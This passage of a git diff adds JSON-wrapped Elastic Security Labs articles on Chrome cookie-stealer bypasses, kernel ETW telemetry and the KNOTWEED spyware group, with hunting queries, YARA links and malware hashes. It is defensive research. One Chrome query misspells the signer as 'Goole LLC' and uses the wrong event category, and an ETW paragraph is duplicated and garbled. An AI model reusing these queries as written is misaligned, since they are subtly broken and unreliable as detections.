\"*--profile-directory=Default*\"\n| eval process_parent_path = replace(to_lower(process.parent.executable), \"\"\"c:\\\\users\\\\[a-zA-Z0-9\\.\\-\\_\\$]+\\\\\"\"\", \"c:\\\\\\\\users\\\\\\\\user\\\\\\\\\")\n| stats agents_count = COUNT_DISTINCT(agent.id), total_executions = count(*) by process_parent_path\n| where agents_count == 1 and total_executions <= 10\n```\n\n\n\n## Untrusted Binaries from Chrome Application folder\n\nSince the Chrome elevation service [trusts](https://github.com/chromium/chromium/blob/main/chrome/elevation_service/caller_validation.cc#L33-L56) binaries running from the Chrome ```program files``` folder, the following queries can be used to hunt for unsigned or untrusted binaries executed or loaded from there: \n\n### Unsigned DLLs loaded from google chrome application folder\n\n``` sql\nFROM logs-endpoint.events.library*\n| where event.category == \"library\" and event.action == \"load\" and to_lower(dll.path) like \"c:\\\\\\\\program files\\\\\\\\google\\\\\\\\chrome\\\\\\\\application\\\\\\\\*\" and not (dll.code_signature.trusted == true)\n| keep process.executable, dll.path, dll.hash.sha256, agent.id\n| stats agents_count = COUNT_DISTINCT(agent.id), total_executions = count(*) by process.executable, dll.path, dll.hash.sha256\n| where agents_count == 1 and total_executions <= 10\n```\n\n### Unsigned executable launched from google chrome application folder\n\n``` sql\nFROM logs-endpoint.events.process*\n| where event.category == \"library\" and event.type == \"start\" and (to_lower(process.executable) like \"c:\\\\\\\\program files\\\\\\\\google\\\\\\\\chrome\\\\\\\\application\\\\\\\\*\" or to_lower(process.executable) like \"c:\\\\\\\\scoped_dir\\\\\\\\program files\\\\\\\\google\\\\\\\\chrome\\\\\\\\application\\\\\\\\*\")\nand not (process.code_signature.trusted == true and process.code_signature.subject_name == \"Goole LLC\")\n| keep process.executable,process.hash.sha256, agent.id\n| stats agents_count = COUNT_DISTINCT(agent.id), total_executions = count(*) by process.executable, process.hash.sha256\n| where agents_count == 1 and total_executions <= 10\n```\n\n\n\n# Conclusion\n\nGoogle has raised the bar implementing new security controls to protect cookie data within Chrome. As expected, this has caused malware developers to develop or integrate their own bypasses. We hope Google will continue to innovate to provide stronger protection for user data. \n\nOrganizations and defenders should consistently monitor for unusual endpoint activity. While these new techniques may be successful, they are also noisy and detectable with the right security instrumentation, processes, and personnel. \n\n## Stealer Bypasses and MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n - [Credential Access](https://attack.mitre.org/tactics/TA0006/)\n - [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n - [Discovery](https://attack.mitre.org/tactics/TA0007/)\n - [Execution](https://attack.mitre.org/tactics/TA0002/)\n\n### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n\n - [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539/)\n - [Process Injection](https://attack.mitre.org/techniques/T1055/)\n - [Credentials from Password Stores](https://attack.mitre.org/techniques/T1555/)\n - [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n - [Process Discovery](https://attack.mitre.org/techniques/T1057/)\n - [Inter-Process Communication: Component Object Model](https://attack.mitre.org/techniques/T1559/001/)\n\n## YARA\n\nElastic Security has created YARA rules to identify this activity. \n\n - [Windows.Trojan.Stealc](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Stealc.yar)\n - [Windows.Infostealer.PhemedroneStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Infostealer_PhemedroneStealer.yar)\n - [Windows.Trojan.MetaStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_MetaStealer.yar)\n - [Windows.Trojan.Xeno](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Xeno.yar)\n - [Windows.Trojan.Lumma](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Lumma.yar)\n - [Windows.Infostealer.Generic](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Infostealer_Generic.yar)\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/app-bound_bypass) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|-----|-----|-----|-----|\n| 27e4a3627d7df2b22189dd4bebc559ae1986d49a8f4e35980b428fadb66cf23d | SHA-256 | num.exe | STEALC |\n| 08d9d4e6489dc5b05a6caa434fc36ad6c1bd8c8eb08888f61cbed094eac6cb37 | SHA-256 | HardCoreCrack.exe | PHEMEDRONE |\n| 43cb70d31daa43d24e5b063f4309281753176698ad2aba9c557d80cf710f9b1d | SHA-256 | Ranginess.exe | METASTEALER |\n| 84033def9ffa70c7b77ce9a7f6008600c0145c28fe5ea0e56dfafd8474fb8176 | SHA-256 | | LUMMA |\n| b74733d68e95220ab0630a68ddf973b0c959fd421628e639c1b91e465ba9299b | SHA-256 | XenoStealer.exe | XENOSTEALER |\n\n\n## References\nThe following were referenced throughout the above research:\n\n - [https://developer.chrome.com/release-notes/127](https://developer.chrome.com/release-notes/127)\n- [https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html)\n"
+ },
+ "title": "Katz and Mouse Game: MaaS Infostealers Adapt to Patched Chrome Defenses",
+ "slug": "katz-and-mouse-game",
+ "date": "2024-10-28",
+ "description": "Elastic Security Labs breaks down bypass implementations from the infostealer ecosystem’s reaction to Chrome 127's Application-Bound Encryption scheme.",
+ "author": [
+ {
+ "slug": "jia-yu-chan"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "seth-goodwin"
+ }
+ ],
+ "image": "Security Labs Images 2.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "infostealer",
+ "chrome",
+ "cookie",
+ "VIDAR",
+ "STEALC",
+ "LUMMA",
+ "METASTEALER",
+ "PHEMEDRONE",
+ "XENOSTEALER"
+ ]
+ },
+ "id": "security_labs_content-katz_and_mouse_game-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-kernel_etw_best_etw-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-kernel_etw_best_etw-md.json
new file mode 100644
index 00000000000..c3e317bdc9a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-kernel_etw_best_etw-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Kernel ETW is the best ETW\"\nslug: \"kernel-etw-best-etw\"\ndate: \"2024-09-13\"\ndescription: \"This research focuses on the importance of native audit logs in secure-by-design software, emphasizing the need for kernel-level ETW logging over user-mode hooks to enhance anti-tamper protections.\"\nauthor:\n - slug: john-uhlmann\nimage: \"kernel-etw-best-etw.jpg\"\ncategory:\n - slug: perspectives\ntags:\n - kernel\n - ETW\n - Windows\n - OS\n---\n\n## Preamble\n\nA critical feature of secure-by-design software is the generation of audit logs when privileged operations are performed. These native audit logs can include details of the internal software state, which are impractical for third-party security vendors to bolt on after the fact.\n\nMost Windows components generate logs using [Event Tracing for Windows](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing) (ETW). These events expose some of Windows's inner workings, and there are scenarios when endpoint security products benefit from subscribing to them. For security purposes, though, not all ETW providers are created equal.\n\nThe first consideration is typically the reliability of the event provider itself - in particular, where the logging happens. Is it within the client process and [trivially vulnerable to ETW tampering](https://twitter.com/dez_/status/938074904666271744)? Or is it perhaps slightly safer over in an RPC server process? Ideally, though, the telemetry will come from the [kernel](https://www.elastic.co/security-labs/doubling-down-etw-callstacks). Given the user-to-kernel security boundary, this provides stronger anti-tamper guarantees over in-process telemetry. This is Microsoft’s recommended approach. Like Elastic Endpoint, Microsoft Defender for Endpoint also uses kernel ETW in preference to fragile user-mode `ntdll` hooks.\n\nFor example, an adversary might be able to easily avoid an in-process user-mode hook on `ntdll!NtProtectVirtualMemory`, but bypassing a kernel [PROTECTVM](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+PROTECTVM) ETW event is significantly harder. Or, at least, [it should be](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need).\n\n\n\nThe Security Event Log is effectively just persistent storage for the events from the Microsoft-Windows-Security-Auditing ETW provider. Surprisingly, [Security Event 4688](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4688) for process creation is not a kernel event. The kernel dispatches the data to the Local Security Authority (`lsass.exe`) service, emitting an ETW event for the Event Log to consume. So, the data could be tampered with from within that server process. Contrast this with the `ProcessStart` event from the Microsoft-Windows-Kernel-Process provider, which is logged directly by the kernel and requires kernel-level privileges to interfere with.\n\nThe second consideration is then the reliability of the information being logged. You might trust the event source, but what if it is just [blindly logging](https://www.elastic.co/security-labs/effective-parenting-detecting-lrpc-based-parent-pid-spoofing) [client-supplied data](https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs) that is extrinsic to the event being logged?\n\nIn this article, we’ll focus on kernel ETW events. These are typically the most security-relevant because they are difficult to bypass and often pertain to privileged actions being performed on behalf of a client thread.\n\nWhen Microsoft introduced Kernel Patch Protection, security vendors were significantly constrained in their ability to monitor the kernel. Given the limited number of kernel extension points provided by Microsoft, they were increasingly compelled to rely on asynchronous ETW events for after-the-fact visibility of kernel actions performed on behalf of malware. \n\nGiven this dependency, the public documentation of Windows kernel telemetry sources is unfortunately somewhat sparse.\n\n\n\n## Kernel ETW Events\n\nThere are currently [four types of ETW providers](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing#types-of-providers) that we need to consider. \n\nFirstly, there are legacy and modern variants of “event provider”:\n\n* legacy ([mof](https://learn.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-)-based) event providers\n* modern ([manifest](https://learn.microsoft.com/en-us/windows/win32/wes/writing-an-instrumentation-manifest)-based) event providers\n\nAnd then there are legacy and modern variants of “trace provider”:\n\n* legacy Windows software trace preprocessor ([WPP](https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/wpp-software-tracing)) trace providers\n* modern [TraceLogging](https://learn.microsoft.com/en-us/windows/win32/tracelogging/trace-logging-about) trace providers\n\nThe “event” versus “trace” distinction is mostly semantic. Event providers are typically registered with the operating system ahead of time, and you can inspect the available telemetry metadata. These are typically used by system administrators for troubleshooting purposes and are often semi-documented. But when something goes really, _really_ wrong there are (hidden) trace providers. These are typically used only by the original software authors for advanced troubleshooting and are undocumented.\n\nIn practice, each uses a slightly different format file to describe and register its events and this introduces minor differences in how the events are logged - and, more importantly, how the potential events can be enumerated.\n\n### Modern Kernel Event Providers\n\nThe modern kernel ETW providers aren’t strictly documented. However, registered event details can be queried from the operating system via the [Trace Data Helper API](https://learn.microsoft.com/en-us/windows/win32/api/tdh/). Microsoft’s [PerfView](https://github.com/microsoft/perfview) tool uses these APIs to reconstruct the provider’s [registration manifest](https://github.com/microsoft/perfview/blob/319be737115e01f77c42804cd1d41755211347f3/src/TraceEvent/RegisteredTraceEventParser.cs#L88), and Pavel Yosifovich’s [EtwExplorer](https://github.com/zodiacon/EtwExplorer) then wraps these manifests in a simple GUI. You can use these [tab-separated value files](https://github.com/jdu2600/Windows10EtwEvents/tree/master/manifest) of registered manifests from successive Windows versions. A single line per event is very useful for grepping, though others have since published the [raw XML manifests](https://github.com/nasbench/EVTX-ETW-Resources/tree/main/ETWProvidersManifests).\n\nThese aren’t all of the possible Windows ETW events, however. They are only the ones registered with the operating system by default. For example, the ETW events for many [server roles aren’t registered](https://github.com/nasbench/EVTX-ETW-Resources/issues/52) until that feature is enabled.\n\n### Legacy Kernel Event Providers\n\nThe [legacy kernel events](https://docs.microsoft.com/en-us/windows/win32/etw/msnt-systemtrace) are documented by Microsoft. Mostly.\n\nLegacy providers also exist within the operating system as WMI [EventTrace](https://learn.microsoft.com/en-us/windows/win32/etw/eventtrace) classes. Providers are the root classes, groups are the children, and events are the grandchildren.\n\n\n\nTo search the legacy events in the same way as modern eventTo search legacy events in the same way as modern events, these classes were parsed, and the original MOF (mostly) reconstructed. This [MOF support was added to EtwExplorer,](https://github.com/zodiacon/EtwExplorer/pull/3) and [tab-separated value summaries](https://github.com/jdu2600/Windows10EtwEvents/tree/master/mof) of the legacy events were these classes were parsed and the original MOF (mostly) reconstructed. This [MOF support was added to EtwExplorer](https://github.com/zodiacon/EtwExplorer/pull/3) and [tab-separated value summaries](https://github.com/jdu2600/Windows10EtwEvents/tree/master/mof) of the legacy events published. \n\n\n\nThe fully reconstructed Windows Kernel Trace MOF is [here](https://gist.github.com/jdu2600/a2b03e4e9cf19282a41ad766388c9856) (or in a tabular format [here](https://github.com/jdu2600/Windows10EtwEvents/blob/master/mof/Windows_Kernel_Trace.tsv)).\n\nOf the 340 registered legacy events, only 116 were documented. Typically, each legacy event needs to be enabled via a specific flag, but these weren’t documented either. There was a clue in the documentation for the kernel [Object Manager Trace](https://learn.microsoft.com/en-us/windows/win32/etw/obtrace) events. It mentioned `PERF_OB_HANDLE`, a constant that is not defined in the headers in the latest SDK. Luckily, [Geoff Chappell](https://geoffchappell.com/studies/windows/km/ntoskrnl/api/etw/tracesup/perfinfo_groupmask.htm) and the Windows 10 1511 WDK came to the rescue. This information was used to add support for `PERFINFO_GROUPMASK` kernel trace flags to Microsoft’s [KrabsETW](https://github.com/microsoft/krabsetw/blob/master/examples/NativeExamples/kernel_trace_002.cpp) library. It also turned out that the Object Trace documentation was wrong. That non-public constant can only be used with an undocumented API extension. Fortunately, public Microsoft projects such as `PerfView` often provide [examples of how to use undocumented APIs](https://github.com/microsoft/perfview/blob/51ec1dffe9055ab58ba1b13d1b716b36760ed895/src/TraceEvent/ETWKernelControl.cs#L464-L469).\n\nWith both manifests and MOFs published on GitHub, most kernel events can now be found with [this query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel).\n\nInterestingly, Microsoft often [obfuscates](https://en.wikipedia.org/wiki/Security_through_obscurity) the names of security-relevant events, so searching for events with a generic name prefix such as `task_` yields some [interesting results](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+task_).\n\nSometimes the keyword hints to the event’s purpose. For example, `task_014` in `Microsoft-Windows-Kernel-General` is enabled with the keyword `KERNEL_GENERAL_SECURITY_ACCESSCHECK.`\n\nAnd thankfully, the parameters are almost always well-named. We might guess that `task_05` in `Microsoft-Windows-Kernel-Audit-API-Calls` is related to [OpenProcess](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess) since it logs fields named `TargetProcessId` and `DesiredAccess`.\n\n[Another useful query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+processstartkey) is to search for events with an explicit `ProcessStartKey` field. ETW events can be [configured](https://learn.microsoft.com/en-us/windows/win32/api/evntrace/ns-evntrace-enable_trace_parameters) to include this field for the logging process, and any event that includes this information for another process is often security relevant.\n\nIf you had a specific API in mind, you might query for its name or its parameters. For example, if you want Named Pipe events, you might use [this query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+namedpipe).\n\nIn this instance, though, `Microsoft-Windows-SEC` belongs to the built-in Microsoft Security drivers that Microsoft Defender for Endpoint (MDE) utilizes. This provider is only officially available to MDE, though [Sebastian Feldmann and Philipp Schmied](https://www.youtube.com/watch?v=tuoA3KGKf7o) have demonstrated how to start a session using an [AutoLogger](https://learn.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session) and subscribe to that session’s events. This is only currently useful for MDE users as otherwise, the driver is not configured to emit events.\n\nBut what about trace providers?\n\n### Modern Kernel Trace Providers\n\nTraceLogging metadata is stored as an opaque blob within the logging binary. Thankfully this format has been reversed by [Matt Graeber](https://posts.specterops.io/data-source-analysis-and-dynamic-windows-re-using-wpp-and-tracelogging-e465f8b653f7). We can use Matt’s script to dump all TraceLogging metadata for `ntoskrnl.exe`. A sample dump of Windows 11 TraceLogging metadata is [here](https://gist.github.com/jdu2600/288475bc43ea68636c28cb25ddeb934f).\n\nUnfortunately, the metadata structure alone doesn’t retain the correlation between providers and events. There are interesting provider names, such as `Microsoft.Windows.Kernel.Security` and `AttackSurfaceMonitor`, but it’s not yet clear from our metadata dump which events belong to these providers.\n\n### Legacy Kernel Trace Providers\n\nWPP metadata is stored within symbols files (PDBs). Microsoft includes this information in the [public symbols for some, but not all, drivers](https://techcommunity.microsoft.com/t5/microsoft-usb-blog/how-to-include-and-view-wpp-trace-messages-in-a-driver-8217-s/ba-p/270778). The kernel itself, however, does not produce any WPP events. Instead, the legacy Windows Kernel Trace event provider can be passed undocumented flags to enable the legacy “trace” events usually only available to Microsoft kernel developers.\n\n| Provider | Documentation | Event Metadata |\n|------------------------|---------------|------------------------------|\n| Modern Event Providers | None | [Registered XML manifests](https://github.com/microsoft/perfview/blob/51ec1dffe9055ab58ba1b13d1b716b36760ed895/src/TraceEvent/RegisteredTraceEventParser.cs#L81-L529) |\n| Legacy Event Providers | Partial | [EventTrace WMI objects](https://learn.microsoft.com/en-us/windows/win32/etw/retrieving-event-data-using-mof) |\n| Modern Trace Providers | None | [Undocumented blob in binary](https://gist.github.com/mattifestation/edbac1614694886c8ef4583149f53658) |\n| Legacy Trace Providers | None | [Undocumented blob in Symbols](https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/trace-message-format-file) |\n\n## Next Steps\n\nWe now have kernel event metadata for each of the four flavours of ETW provider, but a list of ETW events is just our starting point. Knowing the provider and event keyword may not be enough to generate the events we expect. Sometimes, an additional configuration registry key or API call is required. More often, though, we just need to understand the exact conditions under which the event is logged.\n\nKnowing exactly where and what is being logged is critical to truly understanding your telemetry and its limitations. And, thanks to decompilers becoming readily available, we have the option of some just-enough-reversing available to us. In IDA we call this “press F5”. Ghidra is the open-source alternative and it supports scripting … with Java.\n\nFor kernel ETW, we are particularly interested in `EtwWrite` calls that are reachable from system calls. We want as much of the call site parameter information as possible, including any associated public symbol information. This meant that we needed to walk the call graph but also attempt to resolve the possible values for particular parameters.\n\n\n\n\n\nThe necessary parameters were the `RegHandle` and the `EventDescriptor`. The former is an opaque handle for the provider, and the latter provides event-specific information, such as the event id and its associated keywords. An ETW keyword is an identifier used to enable a set of events. \n\nEven better, these event descriptors were typically stored in a global constant with a public symbol.\n\n\n\nWe had sufficient event metadata but still needed to resolve the opaque provider handle assigned at runtime back to the metadata about the provider. For this, we also needed the `EtwRegister` calls.\n\n\n\n\n\nThe typical pattern for kernel modern event providers was to store the constant provider GUID and the runtime handle in globals with public symbols.\n\nAnother pattern encountered was calls to `EtwRegister`, `EtwEwrite`, and `EtwUnregister`, all in the same function. In this case, we took advantage of the locality to find the provider GUID for the event.\n\nModern TraceLogging providers, however, did not have associated per-provider public symbols to provide a hint of each provider’s purpose. However, Matt Graeber had [reversed the TraceLogging metadata](https://posts.specterops.io/data-source-analysis-and-dynamic-windows-re-using-wpp-and-tracelogging-e465f8b653f7) format and documented that the provider name is stored at a [fixed offset](https://gist.github.com/mattifestation/edbac1614694886c8ef4583149f53658#file-tlgmetadataparser-psm1-L461-L473) from the provider GUID. Having the exact provider name is even better than just the public symbol we recovered for modern events.\n\n\n\nThis just left the legacy providers. They didn’t seem to have either public symbols or metadata blobs. Some constants are passed to an undocumented function named `EtwTraceKernelEvent` which wraps the eventual ETW write call.\n\n\n\nThose constants are present in the Windows 10 1511 WDK headers (and the [System Informer](https://github.com/winsiderss/systeminformer/blob/7ad69bf13d31892a89be7230bdbd47ffde024a2b/phnt/include/ntwmi.h#L725) headers), so we could label these events with the constant names.\n\n\n\nThis script has been recently updated for Ghidra 11, along with improved support for TraceLogging and Legacy events. You can now find it on GitHub here - [https://github.com/jdu2600/API-To-ETW](https://github.com/jdu2600/API-To-ETW)\n\nSample output for the Windows 11 kernel is [here](https://github.com/jdu2600/API-To-ETW/blob/main/ntoskrnl.exe.csv).\n\nOur previously anonymous `Microsoft-Windows-Kernel-Audit-API-Calls` events are quickly unmasked by this script.\n\n| Id | EVENT_DESCRIPTOR Symbol | Function |\n|----|-----------------------------------------------------------|------------------------------------------|\n| 1 | KERNEL_AUDIT_API_PSSETLOADIMAGENOTIFYROUTINE | PsSetLoadImageNotifyRoutineEx |\n| 2 | KERNEL_AUDIT_API_TERMINATEPROCESS | NtTerminateProcess |\n| 3 | KERNEL_AUDIT_API_CREATESYMBOLICLINKOBJECT | ObCreateSymbolicLink |\n| 4 | KERNEL_AUDIT_API_SETCONTEXTTHREAD | NtSetContextThread |\n| 5 | KERNEL_AUDIT_API_OPENPROCESS | PsOpenProcess |\n| 6 | KERNEL_AUDIT_API_OPENTHREAD | PsOpenThread |\n| 7 | KERNEL_AUDIT_API_IOREGISTERLASTCHANCESHUTDOWNNOTIFICATION | IoRegisterLastChanceShutdownNotification |\n| 8 | KERNEL_AUDIT_API_IOREGISTERSHUTDOWNNOTIFICATION | IoRegisterShutdownNotification |\n\nSymbol and containing function for Microsoft-Windows-Kernel-Audit-API-Calls events\n\nWith the call path and parameter information recovered by the script, we can also see that the `SECURITY_ACCESSCHECK` event from earlier is associated with the [SeAccessCheck](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-seaccesscheck) kernel API, but only logged within a function named `SeLogAccessFailure`. Only logging failure conditions is a very common occurrence with ETW events. For troubleshooting purposes, the original ETW use case, these are typically the most useful and the implementation in most components reflects this. Unfortunately, for security purposes, the inverse is often true. The successful operation logs are usually more useful for finding malicious activity. So, the value of some of these legacy events is often low.\n\nModern [Secure by Design](https://www.cisa.gov/resources-tools/resources/secure-by-design) practice is to audit log both success and failure for security relevant activities and Microsoft continues to add new security-relevant ETW events that do this. For example, the preview build of Windows 11 24H2 includes some [interesting new ETW events](https://windows-internals.com/an-end-to-kaslr-bypasses/) in the `Microsoft-Windows-Threat-Intelligence` provider. Hopefully, these will be documented for security vendors ahead of its release. \n\nRunning this decompiler script across interesting Windows drivers and service DLLs is left as an exercise to the reader."
+ },
+ "title": "Kernel ETW is the best ETW",
+ "slug": "kernel-etw-best-etw",
+ "date": "2024-09-13",
+ "description": "This research focuses on the importance of native audit logs in secure-by-design software, emphasizing the need for kernel-level ETW logging over user-mode hooks to enhance anti-tamper protections.",
+ "author": [
+ {
+ "slug": "john-uhlmann"
+ }
+ ],
+ "image": "kernel-etw-best-etw.jpg",
+ "category": [
+ {
+ "slug": "perspectives"
+ }
+ ],
+ "tags": [
+ "kernel",
+ "ETW",
+ "Windows",
+ "OS"
+ ]
+ },
+ "id": "security_labs_content-kernel_etw_best_etw-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-knotweed_assessment_summary-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-knotweed_assessment_summary-md.json
new file mode 100644
index 00000000000..fd4df3e4613
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-knotweed_assessment_summary-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"KNOTWEED Assessment Summary\"\nslug: \"knotweed-assessment-summary\"\ndate: \"2022-11-30\"\ndescription: \"KNOTWEED deploys the Subzero spyware through the use of 0-day exploits for Adobe Reader and the Windows operating system. Once initial access is gained, it uses different sections of Subzero to maintain persistence and perform actions on the host.\"\nauthor:\n - slug: andrew-pease\nimage: \"blog-thumb-blind-spots.png\"\ncategory:\n - slug: security-research\n - slug: vulnerability-updates\n---\n\n## Key Takeaways\n\n- KNOTWEED is an activity group sponsored by the PSOA entity DSIRF\n\n- KNOTWEED uses 0-day exploits to load custom malware and frameworks onto victim systems\n\n- Elastic Endpoint Security prevents the execution chain of the VBA from infecting the host with spyware associated with KNOTWEED\n\n## Summary\n\nOn July 27, 2022, Microsoft Threat Intelligence Center (MSTIC) [disclosed](https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/) a private-sector offensive actor (PSOA) that is using 0-day exploits in targeted attacks against European and Central American victims. MSTIC and others are tracking this activity group as KNOTWEED.\n\nPSOAs sell hacking tools, malware, exploits, and services. KNOTWEED is produced by the PSOA named [DSIRF](https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/). DSIRF has been linked to the sale of a malicious toolset (among others) called Subzero which has been observed being deployed through the use of 0-day exploits targeting Adobe and the Windows operating system.\n\nMSTIC has observed victims in the legal, financial, and NGO verticals in Europe and Latin America.\n\n## Assessment\n\n### Risk\n\nKNOTWEED deploys the Subzero spyware through the use of 0-day exploits for Adobe Reader and the Windows operating system. Once initial access is gained, KNOTWEED uses different sections of Subzero to maintain persistence (Jumplump) and to perform actions on the infected host (Corelump).\n\nSuccessful execution of the Subzero spyware allows for the clandestine collection of sensitive information such as credential pairs, system locations, internal reconnaissance, and other remote access capabilities common among spyware.\n\n### Impact\n\nPSOAs are commonly used by activity groups as a way to “leapfrog” capabilities in exploiting and attacking well-defended targets. These activity groups include national intelligence and law enforcement organizations performing sanctioned operations, as well as oppressive governments as a way to collect information on journalists, political dissidents, and activists.\n\nSuccessful execution of the Subzero spyware payload could put targets in danger of physical harm or persecution from non-law enforcement organizations.\n\n### Countermeasures\n\n**Elastic Protections** \nAttempts to use a Visual Basic for Applications (VBA) script for initial execution generates a **Memory Threat Prevention Alert: Shellcode Injection** event. This would stop the execution chain from proceeding and prevent the Subzero spyware from infecting the host.\n\n\n\n\n\nAs of this writing, 4 of the indicators provided by MSTIC were detected by the Elastic malware scoring model as being malicious. The 4 files are used for initial execution (the VBA), credential theft (PassLib), a modular hacking tool (Mex), and the main malware (Corelump). Indicators that were undetected were variations of the persistence loader (Jumplump).\n\nWhile the persistence loader is not detected as malicious, the initial execution prevention of the VBA stops the malware from getting to the persistence phase of the infection.\n\nAll files have been tagged as malicious and will be reflected in the next malware model.\n\n**Elastic Detections**\n\nThe following existing public Detection Rules would have identified the main persistence method used by the JumpLump malware and other post-exploitation techniques :\n\n- [Modification of WDigest Security Provider](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_mod_wdigest_security_provider.toml)\n- [Potential Credential Access via Windows Utilities](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_cmdline_dump_tool.toml)\n- [Component Object Model Hijacking](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_suspicious_com_hijack_registry.toml)\n\n\n\n**Hunting Queries**\n\nThe following EQL queries can be used to hunt for additional behaviors related to JumpLump:\n\n_Abnormally large JPEG dropped by Jumplump:_\n\n```\nfile where event.action != \"deletion\" and\nprocess.executable : \"?:\\\\Windows\\\\System32\\\\*.exe\" and\nfile.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.jpg\" and file.name regex \"\"\"[0-9]{17}\\.jpg\"\"\" and file.size >= 1000000\n```\n\n\n\n_Image load or PE file creation in the print spooler color directory:_\n\n```\nany where event.category in (\"file\", \"library\") and (file.path : \"?:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\color\\\\*.dll\" or dll.path : \"?:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\color\\\\*.dll\")\n```\n\n\n\n**Observations**\n\nWhile there have been no customer observations in Elastic telemetry, this is not unexpected as this activity group has been observed targeting particular victims and the attack pattern or intrusion set appears to be very niche and not widespread. Elastic Security will continue to observe the threat actor and update our readers accordingly.\n\n## Terminology\n\n- **0-day exploit** - vulnerability previously unknown to defenders and does not have a public patch\n- **Activity Group** - individuals, groups, or organizations believed to be operating with malicious intent\n- **Attack Pattern** - describe ways that adversaries attempt to compromise targets\n- **Intrusion Set** - adversarial behaviors and resources with common properties that are believed to be orchestrated by a single organization\n\n## References\n\n- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n"
+ },
+ "title": "KNOTWEED Assessment Summary",
+ "slug": "knotweed-assessment-summary",
+ "date": "2022-11-30",
+ "description": "KNOTWEED deploys the Subzero spyware through the use of 0-day exploits for Adobe Reader and the Windows operating system. Once initial access is gained, it uses different sections of Subzero to maintain persistence and perform actions on the host.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "blog-thumb-blind-spots.png",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ]
+ },
+ "id": "security_labs_content-knotweed_assessment_summary-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-linux_detection_engineering_with_auditd-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-linux_detection_engineering_with_auditd-md.json
new file mode 100644
index 00000000000..d1774907e00
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-linux_detection_engineering_with_auditd-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
